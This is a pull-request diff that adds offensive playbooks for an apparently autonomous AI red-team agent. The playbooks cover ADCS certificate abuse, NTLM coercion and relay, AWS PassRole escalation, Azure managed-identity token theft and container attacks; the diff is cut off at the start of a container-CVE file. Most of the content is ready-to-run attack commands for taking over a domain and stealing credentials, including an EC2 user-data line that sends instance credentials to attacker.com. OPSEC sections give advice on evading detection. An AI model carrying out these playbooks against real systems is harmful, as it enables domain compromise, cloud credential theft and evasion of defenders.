### PR TITLE
feat(skills): 23 new domain playbooks - container/k8s, ICS/OT, modern API, MEV/governance/bridges, advanced AD, malware-RE, C2 frameworks

### DIFF
--- a/packages/decepticon/decepticon/skills/standard/ad/certipy-esc-chain/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/ad/certipy-esc-chain/SKILL.md
@@ -1,0 +1,130 @@
+---
+name: ad-certipy-esc-chain
+description: "ADCS abuse via Certipy — find vulnerable templates (ESC1-ESC15), request a certificate, authenticate as the target, dump the krbtgt. Full chain in 4 commands. Covers ESC1 (any SAN), ESC2 (any-purpose EKU), ESC3 (enrollment-agent), ESC4 (vulnerable ACL), ESC8 (NTLM relay to CA), ESC9/10/11/13."
+when_to_use: "certipy adcs ad cs esc1 esc2 esc3 esc4 esc6 esc7 esc8 esc9 esc10 esc11 esc13 certificate template enrollment agent ntlm relay"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: ad
+  tags: ad, adcs, certificate, privilege-escalation
+  mitre_attack: T1649, T1078.002
+---
+
+# ADCS Abuse via Certipy
+
+`certipy` (Oliver Lyak / ly4k) is the single best tool for ADCS attack. Full domain compromise from a low-priv user in 4 commands, given a vulnerable template.
+
+## 1. Find vulnerable templates
+
+```bash
+certipy find -u 'lowpriv@target.local' -p 'pass' -dc-ip <dc-ip> \
+  -enabled -vulnerable -text -stdout
+
+# Output: shows every ESC1-ESC15 finding with the affected template
+# Look for: "ESC1", "ESC2", "ESC3" sections in the report
+```
+
+If you can't auth, use `-username '' -password ''` (anonymous LDAP — sometimes works) or use the local LDAP from a compromised machine.
+
+## 2. The ESC catalog — quick reference
+
+| ESC | Misconfiguration | Exploitation primitive |
+|---|---|---|
+| **ESC1** | Template allows SAN (Subject Alt Name) + Client Auth EKU + low-priv enrollee | Request cert as any user (`-upn administrator@target.local`) |
+| **ESC2** | Template allows Any Purpose EKU | Same as ESC1, any role |
+| **ESC3** | Template has Certificate Request Agent EKU + low-priv enrollee | Use the cert to request "on behalf of" another user |
+| **ESC4** | Vulnerable ACL on template (WriteOwner/WriteDacl/GenericAll) | Modify template to make it ESC1, then exploit |
+| **ESC5** | Vulnerable ACL on PKI objects (CA, OID containers) | Same — modify, then exploit |
+| **ESC6** | `EDITF_ATTRIBUTESUBJECTALTNAME2` flag on CA | Request ANY template with `-upn target` |
+| **ESC7** | Low-priv has Manage CA / Manage Certificates | Approve own requests, issue certs to anyone |
+| **ESC8** | HTTP-based enrollment endpoint exists | NTLM relay to `/certsrv/certfnsh.asp` (see ad-coercer) |
+| **ESC9** | `msPKI-Enrollment-Flag` lacks STRONG_KEY_PROTECTION_REQUIRED and template has `UPN` mapping | Spoof UPN, get cert |
+| **ESC10** | Weak certificate mapping (UPN-only, no SID extension) | Same as ESC9 but for kerberos PKINIT |
+| **ESC11** | RPC binding without packet integrity | Relay over RPC instead of HTTP |
+| **ESC13** | Template grants OID group membership (ADCS-managed groups) | Get cert → become member of high-priv group |
+| **ESC14** | Specific weak ACE patterns on cert templates | Edit template, ESC1-chain |
+| **ESC15** | `EKUwu` — EKU manipulation on V1 templates | Add Client Auth EKU to a template that lacked it |
+
+## 3. Exploit ESC1 (the most common)
+
+```bash
+# Request a cert as Domain Administrator
+certipy req -u 'lowpriv@target.local' -p 'pass' -dc-ip <dc-ip> \
+  -ca 'TARGET-CA' \
+  -template 'VulnerableTemplate' \
+  -upn 'administrator@target.local' \
+  -sid 'S-1-5-21-XXXX-500'
+
+# Output: writes administrator.pfx — full DA cert.
+```
+
+## 4. Authenticate with the cert
+
+```bash
+# Convert to TGT
+certipy auth -pfx administrator.pfx -username administrator -domain target.local -dc-ip <dc-ip>
+# Output: NT hash + TGT
+
+# Use the NT hash for pass-the-hash
+impacket-psexec -hashes ':<NT_HASH>' target.local/administrator@dc.target.local
+```
+
+## 5. DCSync krbtgt (final step)
+
+```bash
+# Either with the cert-derived TGT:
+KRB5CCNAME=administrator.ccache impacket-secretsdump -k -no-pass dc.target.local
+# Or with the NT hash:
+impacket-secretsdump -hashes ':<NT_HASH>' target.local/administrator@dc.target.local
+# Dumps krbtgt — full domain compromise; forge golden tickets at will.
+```
+
+## ESC8 chain (no vulnerable template, but ADCS Web Enrollment is enabled)
+
+```bash
+# Terminal 1: relay listener
+sudo impacket-ntlmrelayx -t http://ca.target.local/certsrv/certfnsh.asp \
+  -smb2support --adcs --template DomainController
+
+# Terminal 2: coerce DC$
+python3 PetitPotam.py <attacker_ip> <dc-ip>
+# OR Coercer with anonymous auth
+
+# Terminal 1 catches: GOT CERTIFICATE! Base64 PFX of DC$
+# Decode, save as dc.pfx, then:
+certipy auth -pfx dc.pfx -username 'dc$' -domain target.local -dc-ip <dc-ip>
+# Dumps krbtgt next.
+```
+
+## ESC9/10 chain (UPN mapping abuse)
+
+If you have GenericWrite on a user object (e.g., via low-priv-on-svc-account):
+
+```bash
+# 1. Change target user's UPN to a victim with no cert protection
+certipy account update -u lowpriv@target.local -p pass \
+  -user 'victim' -upn 'administrator@target.local'
+
+# 2. Request a cert as victim (now resolves to admin)
+certipy req -u lowpriv@target.local -p pass -ca TARGET-CA -template User \
+  -dc-ip <dc-ip>
+
+# 3. Revert UPN to avoid detection
+certipy account update -u lowpriv -p pass -user victim -upn 'victim@target.local'
+
+# 4. Auth with the cert — gives Administrator hash
+certipy auth -pfx victim.pfx -domain target.local -dc-ip <dc-ip>
+```
+
+## OPSEC
+
+- Microsoft Defender for Identity (MDI) flags ADCS abuse via specific event IDs (4886, 4887, 4768 with cert-based auth).
+- Issuing cert to a high-priv account from a low-priv source is one of the most-watched detections.
+- For evasion: use legitimate-looking template names; request via the most-common CA in the org; UPN-revert immediately (ESC9/10).
+- `certipy auth` uses PKINIT — leaves a 4768 (TGT request) where `Certificate Information` field is populated. Distinctive.
+
+## References
+
+- "Certified Pre-Owned" — SpecterOps whitepaper (the original ESC1-ESC8 catalog)
+- "Certipy 4.0" release notes (ly4k.github.io) — adds ESC9-ESC15
+- ly4k/Certipy on GitHub — the canonical tool
+- Microsoft KB articles on ADCS hardening (defender lens)

--- a/packages/decepticon/decepticon/skills/standard/ad/coercer/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/ad/coercer/SKILL.md
@@ -1,0 +1,106 @@
+---
+name: ad-coercer
+description: "Authentication coercion against Windows / AD — PetitPotam (MS-EFSR), PrinterBug (MS-RPRN), DFSCoerce (MS-DFSNM), ShadowCoerce (MS-FSRVP), Coercer.py meta-tool. Force a Windows machine to NTLM-authenticate to attacker, then relay or crack offline."
+when_to_use: "petitpotam printerbug dfscoerce shadowcoerce coercer msefsr msrprn msdfsnm msfsrvp authentication coercion ntlm relay"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: ad
+  tags: ad, coercion, ntlm-relay, petitpotam
+  mitre_attack: T1187, T1557.001
+---
+
+# Authentication Coercion (PetitPotam family)
+
+Force a Windows machine — usually a Domain Controller — to send an NTLM authentication to an attacker-controlled host. Then either relay the auth (via `ntlmrelayx`) or crack it offline.
+
+## The family of coercion vulnerabilities
+
+| Vector | Protocol | RPC | Mitigated by |
+|---|---|---|---|
+| **PetitPotam** | MS-EFSR (Encrypting File System Remote) | `EfsRpcOpenFileRaw` | KB5005413 (Aug 2021) — partial; bypasses persist via other Efs* methods |
+| **PrinterBug** | MS-RPRN (Print System Remote) | `RpcRemoteFindFirstPrinterChangeNotificationEx` | Disable Print Spooler |
+| **DFSCoerce** | MS-DFSNM (Distributed File System) | `NetrDfsGetVersion`, `NetrDfsRemoveStdRoot` | Restrict DFSN to admins |
+| **ShadowCoerce** | MS-FSRVP (File Server Remote VSS) | `IsPathSupported` | KB5015527 (Jul 2022) |
+| **CheeseOunce / WebDavCoerce** | WebDAV WebClient | (various) | Disable WebClient service |
+
+All four boil down to: an unauthenticated/low-priv RPC call that triggers the target to authenticate outbound.
+
+## Workflow
+
+### 1. Set up the listener (attacker)
+
+```bash
+# Option A: ntlmrelayx (relay auth to a useful service)
+sudo impacket-ntlmrelayx -t ldap://dc.target.local --escalate-user lowpriv -smb2support
+# OR relay to ADCS for cert-based domain admin:
+sudo impacket-ntlmrelayx -t http://ca.target.local/certsrv/certfnsh.asp \
+  -smb2support --adcs --template DomainController
+
+# Option B: just capture the hash
+sudo impacket-ntlmrelayx -t ldap://dc.target.local --no-smb-server
+# OR with responder
+sudo responder -I eth0
+```
+
+### 2. Coerce auth from a target machine
+
+```bash
+# Coercer — meta-tool, tries every vector
+git clone https://github.com/p0dalirius/Coercer
+sudo python3 Coercer.py coerce -l <attacker_ip> -t <target_ip> -u 'low_priv_user' -p 'pass'
+# or anonymous (often works pre-PetitPotam patch):
+sudo python3 Coercer.py coerce -l <attacker_ip> -t <target_ip> -u '' -p ''
+
+# Or individual scripts:
+python3 PetitPotam.py <attacker_ip> <target_ip>
+python3 dfscoerce.py -u lowpriv -p pass <attacker_ip> <target_ip>
+python3 printerbug.py target.local/user:pass@<target_ip> <attacker_ip>
+```
+
+### 3. Catch the auth → escalate
+
+```
+[ntlmrelayx] SMBD-Thread-X: Received connection from <target_ip>, attacking target ldap://dc.target.local
+[ntlmrelayx] Authenticating against ldap://dc.target.local as TARGET\DC$ SUCCEED
+[ntlmrelayx] Adding lowpriv to Domain Admins group: SUCCEED
+```
+
+If you relayed to ADCS:
+```
+[ntlmrelayx] GOT CERTIFICATE! ID 1234
+[ntlmrelayx] Base64 certificate of user DC$: MII...
+```
+Then use that cert with `certipy auth -pfx dc.pfx -username 'dc$' -domain target.local`.
+
+## Why coerce DC$? — The privilege escalation chain
+
+The DC's machine account (`DC$`) has `Replicating Directory Changes` permission. With its NTLM hash or TGT, you DCSync and own the domain:
+
+```bash
+# After getting DC$ cert from ADCS relay:
+certipy auth -pfx dc.pfx -username 'dc$' -domain target.local
+# Returns TGT
+impacket-secretsdump -k -no-pass target.local/dc$@dc.target.local
+# Dumps krbtgt — full domain compromise
+```
+
+## Targets that work
+
+- Any unpatched DC (most environments still have PetitPotam variants)
+- Any server with Print Spooler running (PrinterBug)
+- Any Windows server with DFS Namespace (often DCs + file servers)
+- ADCS Web Enrollment endpoint (relay to it for cert-based DA)
+
+## OPSEC
+
+- Coercion attempts log `EFSRPC_*` / `RPRN_*` event sources on the target — usually low-priority but visible in dedicated AD-attack detection (MDI, Defender for Identity).
+- Inbound NTLM authentication from a DC to a non-domain workstation is a strong signal — relay to a host that legitimately receives auth (a file server, a printer-ish hostname).
+- Use a coercion vector that DOESN'T require credentials (PetitPotam unauthenticated path, ShadowCoerce) if possible — leaves no user-level audit trace.
+
+## References
+
+- topotam77's PetitPotam — github.com/topotam/PetitPotam
+- p0dalirius's Coercer — github.com/p0dalirius/Coercer
+- dirkjanm's "Relaying NTLM auth" series
+- SpecterOps "Coercing AD auth" cheat sheet
+- ADCS abuse: SpecterOps "Certified Pre-Owned" whitepaper

--- a/packages/decepticon/decepticon/skills/standard/ad/ntlm-relay/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/ad/ntlm-relay/SKILL.md
@@ -1,0 +1,121 @@
+---
+name: ad-ntlm-relay
+description: "NTLM relay deep-dive — `ntlmrelayx` configuration matrix (SMB, LDAP, LDAPS, HTTP, RPC, IMAP, MSSQL), SMB-signing bypass, target selection (DC for DCSync, ADCS for cert, LAPS reader for cleartext), session relay vs cracking trade-off, multi-relay (forward auth from one victim to many)."
+when_to_use: "ntlm relay ntlmrelayx smb signing ldap ldaps adcs mssql relay multi-relay impacket"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: ad
+  tags: ad, ntlm-relay, mitm, impacket
+  mitre_attack: T1557.001, T1550.002
+---
+
+# NTLM Relay Deep Dive
+
+You've got NTLM authentication arriving at attacker (via Responder, ARP poison, coercion, mDNS, WPAD). Relay it to a target that grants you something useful.
+
+## Target selection matrix
+
+| Target protocol | Outcome | Requires |
+|---|---|---|
+| **LDAP / LDAPS to a DC** | Add user to Domain Admins, RBCD, modify ACL | Victim is local admin OR LDAPS allows signing |
+| **SMB to a workstation** | Code exec on that workstation | SMB signing OFF on target (servers often have it ON) |
+| **HTTP /certsrv/** (ADCS) | Cert for victim — auth as them | ADCS Web Enrollment enabled |
+| **MSSQL** | Database access; `xp_cmdshell` if linked | Victim has DB privs |
+| **IMAP** (Exchange) | Mailbox access | Victim has mailbox |
+| **HTTP /EWS** (Exchange) | Mailbox + autodiscover | EWS reachable |
+| **LDAPS to DC for shadow creds** | Set msDS-KeyCredentialLink on a victim | LDAPS + WriteProperty |
+
+## SMB signing — the key constraint
+
+| Target | Default SMB signing |
+|---|---|
+| DC | REQUIRED (signing on, must verify) — **can't relay SMB to DC** |
+| Domain workstations | NOT REQUIRED (off by default) — **can relay** |
+| File servers | usually REQUIRED |
+| Linux Samba | varies |
+
+Check with `crackmapexec smb <target_subnet> --gen-relay-list relays.txt` — gives you the list of targets where SMB signing is OFF.
+
+## Most useful chains
+
+### Coerce → relay to LDAP → RBCD attack
+```bash
+# Listener
+sudo impacket-ntlmrelayx -t ldap://dc.target.local --delegate-access --escalate-user 'lowpriv'
+# Now coerce DC$ (see ad-coercer skill)
+# ntlmrelayx auto-adds attacker computer to msDS-AllowedToActOnBehalfOfOtherIdentity
+# Then S4U2Proxy yourself onto the DC:
+impacket-getST -spn 'cifs/dc.target.local' -impersonate Administrator 'target.local/lowpriv:pass'
+# → TGS as Administrator for cifs on the DC — full takeover
+```
+
+### Coerce → relay to ADCS → DA cert
+See `ad-certipy-esc-chain` skill — chain ends with `certipy auth` → krbtgt.
+
+### Responder → relay to LDAP for Shadow Credentials
+```bash
+sudo responder -I eth0 -wd
+# Catch broadcast LLMNR / NBT-NS / mDNS
+# Then:
+sudo impacket-ntlmrelayx -t ldaps://dc.target.local --shadow-credentials --shadow-target victim
+# Adds a KeyCredentialLink to 'victim'; then auth as victim via certipy
+```
+
+### Relay to MSSQL — pivot via xp_cmdshell
+```bash
+sudo impacket-ntlmrelayx -t mssql://sqlserver.target.local -smb2support
+# When relayed:
+[ntlmrelayx] EXEC AS LOGIN sa: SUCCEED
+[ntlmrelayx] Enabling xp_cmdshell on target
+[ntlmrelayx] xp_cmdshell SUCCEED: id of nt service\mssqlserver
+```
+
+### Multi-relay — fan-out one auth to many targets
+```bash
+# -tf file_of_targets: relay to each in turn
+sudo impacket-ntlmrelayx -tf relays.txt -smb2support
+# crackmapexec --gen-relay-list builds the relays.txt file (SMB-signing-OFF hosts)
+```
+
+## When to crack instead of relay
+
+If the auth is NetNTLMv2 (came from SMB1/SMB2, HTTP, etc.):
+
+```bash
+# Save the captured hash
+# Responder writes to /usr/share/responder/logs/Responder-Session.log
+hashcat -m 5600 hash.txt rockyou.txt -r best64.rule
+# m=5600 → NetNTLMv2 cracking; works well on rockyou+rules
+```
+
+Relay is BETTER when:
+- You don't have time to crack (operationally bounded engagement)
+- The hash is from a service account / computer account (uncrackable)
+- The target requires the actual session (e.g., LDAPS, signed SMB)
+
+Crack is BETTER when:
+- You want offline persistence (don't need to be on the wire)
+- The credentials are reusable across services
+- Auth was from a normal user with a weak password
+
+## Signing-required mitigations and bypasses
+
+| Defense | Bypass |
+|---|---|
+| SMB signing required on target | Relay to NON-SMB target (LDAP, HTTP, MSSQL) |
+| LDAP channel binding | Relay to LDAPS instead (different binding rules) |
+| Extended Protection for Authentication (EPA) | Relay to a service that doesn't enforce EPA (older Exchange, etc.) |
+| MS16-075 ("hot potato" SMB→SMB block) | Cross-protocol relay works around it |
+
+## OPSEC
+
+- Coercion is the LOUDEST step. Use unauthenticated PetitPotam variants where possible.
+- LDAP relay creates events 4662 (object access) and 5136 (directory modify) on the DC — distinctive when DC$ modifies its own attributes via NTLM auth.
+- MDI (Defender for Identity) flags NTLM relay via the source-vs-destination IP mismatch heuristic. Use a network position physically close to the victim to minimize the geographical jump.
+
+## References
+
+- impacket ntlmrelayx — github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py
+- dirkjanm "NTLM relay" series (the canonical reference)
+- SpecterOps "Hosting a Relay Server" / "Forcing NTLM auth"
+- BHIS / TrustedSec "NTLM Relaying for Fun and Profit"

--- a/packages/decepticon/decepticon/skills/standard/cloud/aws-iam-passrole-chain/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/aws-iam-passrole-chain/SKILL.md
@@ -1,0 +1,130 @@
+---
+name: aws-iam-passrole-chain
+description: "AWS IAM privilege escalation via `iam:PassRole` chains — Lambda/Glue/Sagemaker/EC2/ECS PassRole to a higher-priv role, AssumeRole chains across accounts, sts:GetCallerIdentity recon, account hijack via legacy root-mfa-bypass."
+when_to_use: "aws iam passrole assumerole privilege escalation lambda glue sagemaker ec2 ecs role chain account pivot sts getcalleridentity"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: cloud
+  tags: aws, iam, privilege-escalation, passrole
+  mitre_attack: T1078.004, T1098, T1550.001
+---
+
+# AWS IAM PassRole Chain
+
+You have AWS credentials (env vars, ~/.aws/credentials, EC2 IMDS, ECS task role, leaked GitHub keys). Find the path to higher privilege via PassRole.
+
+## Enumerate
+
+```bash
+aws sts get-caller-identity                                  # who are you?
+aws iam list-attached-user-policies --user-name $(aws sts get-caller-identity --query Arn --output text | cut -d/ -f2)
+aws iam list-user-policies --user-name <you>
+aws iam get-account-summary
+
+# Or for a role (e.g., EC2 instance):
+aws sts get-caller-identity                                  # check Arn = role
+ROLE=$(aws sts get-caller-identity --query Arn --output text | cut -d/ -f2)
+aws iam list-attached-role-policies --role-name $ROLE
+aws iam list-role-policies --role-name $ROLE
+```
+
+Use [Pacu](https://github.com/RhinoSecurityLabs/pacu) — `enum_permissions` — for the canonical enumeration.
+
+## Phase 1: Identify your PassRole targets
+
+```bash
+# What roles can your principal PassRole?
+# Check policy for iam:PassRole — note the Resource:
+aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/<your-policy> --version-id v1 \
+  | jq '.PolicyVersion.Document.Statement[] | select(.Action[]?=="iam:PassRole" or .Action=="iam:PassRole")'
+
+# List all roles (need iam:ListRoles)
+aws iam list-roles --query 'Roles[].[RoleName,AssumeRolePolicyDocument]' --output text
+```
+
+## Phase 2: PassRole → execute as higher-priv role
+
+### Lambda — most common path
+```bash
+# Create a Lambda that runs as TARGET_ROLE and returns its credentials
+cat > pwn.py <<'EOF'
+def lambda_handler(event, context):
+    import os
+    return {
+        "AKI": os.environ["AWS_ACCESS_KEY_ID"],
+        "SAK": os.environ["AWS_SECRET_ACCESS_KEY"],
+        "TOK": os.environ["AWS_SESSION_TOKEN"],
+    }
+EOF
+zip pwn.zip pwn.py
+aws lambda create-function --function-name pwn --runtime python3.11 \
+  --role arn:aws:iam::ACCT:role/TARGET_ROLE --handler pwn.lambda_handler \
+  --zip-file fileb://pwn.zip
+aws lambda invoke --function-name pwn /tmp/o.json && cat /tmp/o.json
+# /tmp/o.json now contains TARGET_ROLE credentials
+```
+
+### Glue Dev Endpoint
+```bash
+aws glue create-dev-endpoint --endpoint-name pwn --role-arn arn:aws:iam::ACCT:role/TARGET_ROLE
+# SSH into it; whoami is TARGET_ROLE
+```
+
+### EC2 Instance Profile
+```bash
+aws ec2 run-instances --image-id ami-0c55b159cbfafe1f0 --instance-type t2.micro \
+  --iam-instance-profile Name=TARGET_PROFILE --user-data "$(printf '#!/bin/bash\ncurl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/TARGET_ROLE > /tmp/c.json && curl -X POST -d @/tmp/c.json https://attacker.com/x')"
+```
+
+### SageMaker Notebook
+```bash
+aws sagemaker create-notebook-instance --notebook-instance-name pwn --instance-type ml.t2.medium \
+  --role-arn arn:aws:iam::ACCT:role/TARGET_ROLE
+# Then open the notebook URL; in a cell: !aws sts get-caller-identity
+```
+
+## Phase 3: AssumeRole chains across accounts
+
+```bash
+# If you have sts:AssumeRole on a cross-account role:
+aws sts assume-role --role-arn arn:aws:iam::OTHER_ACCT:role/CROSSACCT_ROLE --role-session-name pwn
+# Use the returned Credentials for the next hop.
+
+# Chain depth — repeat assume-role with each new principal.
+```
+
+## Phase 4: Privilege escalation classes (Pacu — `iam__privesc_scan`)
+
+| Method | Required permission |
+|---|---|
+| `CreateNewPolicyVersion` | `iam:CreatePolicyVersion` on a policy attached to a higher-priv user |
+| `SetExistingDefaultPolicyVersion` | `iam:SetDefaultPolicyVersion` |
+| `CreateAccessKey` | `iam:CreateAccessKey` on a higher-priv user |
+| `CreateLoginProfile` | `iam:CreateLoginProfile` — log in as the target user via console |
+| `UpdateLoginProfile` | `iam:UpdateLoginProfile` — reset the target user's console password |
+| `AttachUserPolicy` | `iam:AttachUserPolicy` — attach `AdministratorAccess` to yourself |
+| `AttachGroupPolicy` | `iam:AttachGroupPolicy` |
+| `AttachRolePolicy` | `iam:AttachRolePolicy` |
+| `PutUserPolicy` | `iam:PutUserPolicy` — inline policy bypass |
+| `AddUserToGroup` | `iam:AddUserToGroup` — add yourself to admins |
+| `UpdateAssumeRolePolicy` | `iam:UpdateAssumeRolePolicy` — make a role assumable by you |
+| `PassExistingRoleToNewLambda` | `iam:PassRole` + `lambda:CreateFunction/InvokeFunction` |
+| `PassExistingRoleToNewGlueDevEndpoint` | as above for Glue |
+| `EditExistingLambdaFunctionWithRole` | `lambda:UpdateFunctionCode` on an existing Lambda |
+| `PassExistingRoleToNewCloudFormation` | `iam:PassRole` + `cloudformation:CreateStack` |
+| `PassExistingRoleToNewDataPipeline` | as above for Data Pipeline |
+| `CodeStarCreateProjectFromTemplate` | exotic — older accounts |
+
+## OPSEC
+
+- Every IAM and STS call is in CloudTrail. Volume of `assume-role` is normal — `create-function` with a new role is not.
+- GuardDuty has finding types `Recon:IAMUser/ResourceConsumption` and `Privilege Escalation:IAMUser/AnomalousBehavior`. Move slowly.
+- For low-noise: use existing Lambda functions (replace their code) rather than creating new ones — `UpdateFunctionCode` is far more common in normal traffic.
+- Sensitive: GuardDuty flags `AwsApiCall: PutEventSelectors / StopLogging` on CloudTrail — don't try to silence telemetry.
+
+## References
+
+- Pacu (RhinoSecurityLabs) — automated enum + privesc
+- "AWS IAM Privilege Escalation Methods" — Spencer Gietzen, RhinoSecurityLabs
+- ScoutSuite, Prowler — defender perspective
+- DEFCON 30 "Cloud Village" — recurring AWS IAM track

--- a/packages/decepticon/decepticon/skills/standard/cloud/azure-managed-identity/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/azure-managed-identity/SKILL.md
@@ -1,0 +1,110 @@
+---
+name: azure-managed-identity
+description: "Azure Managed Identity abuse — IMDS at 169.254.169.254 from compromised VM / App Service / Function, token exchange for Graph/ARM/KeyVault, federated workload identity abuse, hybrid AAD Connect MSOL credential extraction."
+when_to_use: "azure managed identity msi imds 169.254 system-assigned user-assigned graph arm keyvault workload identity aad connect msol federated"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: cloud
+  tags: azure, managed-identity, cloud-credential
+  mitre_attack: T1552.005, T1078.004
+---
+
+# Azure Managed Identity Abuse
+
+You have RCE in an Azure compute resource (VM, App Service, Function, AKS, Container Apps). Steal the Managed Identity token and pivot.
+
+## Steal the token
+
+### Linux VM / Container
+```bash
+TOKEN=$(curl -s -H Metadata:true \
+  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" \
+  | jq -r .access_token)
+```
+
+### Windows VM
+```powershell
+$h = @{Metadata="true"}
+$r = Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -Headers $h
+$TOKEN = $r.access_token
+```
+
+### App Service / Function (different endpoint, requires `IDENTITY_HEADER`)
+```bash
+TOKEN=$(curl -s -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" \
+  "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" \
+  | jq -r .access_token)
+```
+
+## Common token audiences (`resource` param)
+
+| Audience URL | Use |
+|---|---|
+| `https://management.azure.com/` | ARM — list/modify Azure resources |
+| `https://graph.microsoft.com/` | Microsoft Graph — read directory, mail, groups |
+| `https://vault.azure.net` | Key Vault — secrets, keys, certificates |
+| `https://storage.azure.com/` | Storage account — blob/queue/file/table |
+| `https://database.windows.net/` | Azure SQL |
+| `https://servicebus.azure.net/` | Service Bus |
+
+Request one token per audience — the MI assignment determines which work.
+
+## Use the token
+
+```bash
+# Enumerate the subscription
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://management.azure.com/subscriptions?api-version=2020-01-01" | jq .
+
+# List Key Vaults (then a VAULT_TOKEN to read secrets)
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://management.azure.com/subscriptions/$SUB/providers/Microsoft.KeyVault/vaults?api-version=2022-07-01"
+
+# Read every secret
+VAULT_TOKEN=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" | jq -r .access_token)
+curl -s -H "Authorization: Bearer $VAULT_TOKEN" "https://$VAULT_NAME.vault.azure.net/secrets?api-version=7.4" | jq .
+```
+
+## Pivot patterns
+
+| MI permission | Pivot to |
+|---|---|
+| Contributor on subscription | RunCommand on every VM in the sub → fleet-wide RCE |
+| KeyVault Reader / Secrets User | Decrypt all stored credentials |
+| User Access Administrator | Self-grant Owner role anywhere |
+| AAD App Owner | Modify app registration → app-credential persistence |
+| Storage Account Contributor | Steal storage keys → SAS tokens (low audit signature) |
+
+## Workload Identity (federated, no client secret)
+
+AKS pods using Workload Identity Federation get a token via projected SA token + STS exchange. Steal the projected token from `/var/run/secrets/azure/tokens/azure-identity-token`, then:
+
+```bash
+SATOKEN=$(cat /var/run/secrets/azure/tokens/azure-identity-token)
+TOKEN=$(curl -s -X POST "https://login.microsoftonline.com/$TENANT/oauth2/v2.0/token" \
+  -d "client_id=$CLIENT_ID&scope=https://management.azure.com/.default&grant_type=client_credentials&client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer&client_assertion=$SATOKEN" | jq -r .access_token)
+```
+
+## AAD Connect MSOL (hybrid environments)
+
+On a server running AAD Connect, MSOL_xxxxxxx in local SAM has DCSync rights → full domain compromise. Steal via DPAPI:
+
+```powershell
+# Run as SYSTEM on AAD Connect server
+$key = (New-Object System.Security.Cryptography.AesManaged).Key
+# AADInternals does this end-to-end:
+Get-AADIntSyncCredentials      # AADInternals — extracts MSOL creds
+```
+
+## OPSEC
+
+- Azure Activity Log records every ARM call. Use Graph for low-noise enumeration.
+- Token TTL ~24h. Re-stealing is logged via the IMDS access pattern (visible in Azure VM monitor).
+- `IDENTITY_HEADER` env on App Service is process-scope — exfil it from a single trick command, then reuse.
+- Defender for Cloud + Microsoft Sentinel detect: "ManagedIdentityToken used from non-Azure IP" → exfil tokens carefully.
+
+## References
+
+- MicroBurst (NetSPI), MicroBurst-Cloud (Karl Fosaaen) — Azure-specific tooling
+- ROADtools (Dirk-jan) — AAD enumeration without alerts
+- DEFCON 30 "Abusing Azure Active Directory" — Andy Robbins

--- a/packages/decepticon/decepticon/skills/standard/cloud/container/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/container/SKILL.md
@@ -1,0 +1,46 @@
+---
+name: container-overview
+description: "Container / Kubernetes attack category — pod escape, RBAC abuse, runtime CVE exploitation, socket-mount escape. Routing skill: identify the surface (pod-internal RCE vs API-level vs build-pipeline), then load the matching sub-skill."
+when_to_use: "container kubernetes k8s docker podman containerd cri-o pod rbac runtime escape supply chain image registry helm"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: cloud-native
+  tags: kubernetes, container, cloud-native
+  mitre_attack: T1611, T1078.004, T1190
+---
+
+# Container / Kubernetes Attack Category
+
+This is a routing skill for cloud-native engagements. Identify the surface, then load the matching sub-skill.
+
+## Sub-skills
+
+| Sub-skill | Covers | When to load |
+|---|---|---|
+| **k8s-pod-escape** | Privileged container, hostPath escape, hostPID + SYS_PTRACE, runC CVE chains, cgroup release agent | RCE inside a pod, goal is node compromise | `load_skill("/skills/standard/cloud/container/k8s-pod-escape/SKILL.md")` |
+| **k8s-rbac-abuse** | `auth can-i --list`, pods/exec on privileged pods, secrets get/list, escalate verb, bind verb, impersonate, nodes/proxy | You have a ServiceAccount token; goal is cluster-admin | `load_skill("/skills/standard/cloud/container/k8s-rbac-abuse/SKILL.md")` |
+| **docker-socket-mount** | `/var/run/docker.sock` or containerd socket mounted in → instant host root | CI runners, ArgoCD/Flux, DinD, Jenkins agents | `load_skill("/skills/standard/cloud/container/docker-socket-mount/SKILL.md")` |
+| **container-cve** | Catalog of high-impact runtime CVEs — Leaky Vessels, runC 2019-5736, BuildKit chain, CRI-O 2022-0811 | Container runtime version fingerprinted | `load_skill("/skills/standard/cloud/container/container-cve/SKILL.md")` |
+
+## Quick routing
+
+```
+Container target identified?
+├── You have RCE in a pod / container         → k8s-pod-escape
+├── You have a Kubernetes SA token            → k8s-rbac-abuse
+├── Socket mounted (`docker.sock`, etc.)      → docker-socket-mount
+├── Runtime version is old / vulnerable       → container-cve
+└── Unknown / all of above                     → start with k8s-pod-escape's Phase 1
+```
+
+## Tooling
+
+| Tool | Use |
+|---|---|
+| `kubectl` | API-level enumeration and abuse |
+| `kube-hunter` | Automated cluster vulnerability scan |
+| `kdigger` | In-cluster recon (Quarkslab) |
+| `peirates` | Kubernetes-specific privilege escalation |
+| `botb` | Container break-out (Brad-Beam et al.) |
+| `nsenter` | Cross-namespace process / mount entry |
+| `crictl` / `ctr` / `nerdctl` | containerd / CRI direct access |

--- a/packages/decepticon/decepticon/skills/standard/cloud/container/container-cve/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/container/container-cve/SKILL.md
@@ -1,0 +1,123 @@
+---
+name: container-cve
